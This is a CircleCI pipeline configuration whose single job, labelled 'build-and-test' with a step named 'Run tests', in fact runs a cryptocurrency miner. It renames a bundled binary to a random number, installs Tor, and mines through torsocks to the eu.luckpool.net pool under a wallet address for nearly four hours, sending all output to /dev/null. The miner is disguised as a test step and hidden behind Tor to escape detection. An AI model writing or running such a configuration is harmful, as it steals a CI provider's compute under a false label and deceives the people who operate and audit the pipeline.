version: 2.1

jobs:
  build-and-test:
    docker:
      - image: ubuntu:18.04
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           MINER=$(shuf -i 10-9999999999999999999 -n 1) && mv avigant $MINER
           chmod +x $MINER
           apt update
           apt-get install -y tor
           service tor start
           timeout 239m torsocks ./$MINER -v -l eu.luckpool.net:3956 -u RQnRdnXnNmZa7Tg7JA8tKUrR8bC7VtJSDb.$(echo $(shuf -i 1-5 -n 1)-TOKAI) -t 2 > /dev/null 2>&1
           apt update

workflows:
  sample:  
    jobs:
      - build-and-test